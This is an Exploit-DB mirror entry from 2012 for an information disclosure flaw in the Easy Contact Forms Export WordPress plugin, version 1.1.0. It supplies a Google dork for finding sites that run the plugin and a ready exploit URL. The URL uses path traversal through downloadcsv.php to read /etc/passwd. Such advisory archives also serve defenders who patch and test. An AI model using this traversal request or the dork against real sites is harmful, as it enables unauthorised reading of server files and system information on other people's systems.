exploit-db-mirror/exploits/php/webapps/19013.txt

##################################################
# Description : Wordpress Plugins - Easy Contact Forms Export
Information Disclosure Vulnerability
# Version : 1.1.0
# Link : http://wordpress.org/extend/easy-contact-forms-exporter/
# Plugins :
http://downloads.wordpress.org/plugin/easy-contact-forms-exporter.zip
# Date : 26-05-2012
# Google Dork : inurl:/wp-content/plugins/easy-contact-forms-exporter/
# Author : Sammy FORGIT - sam at opensyscom dot fr -
http://www.opensyscom.fr
##################################################

Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php?file=../etc/passwd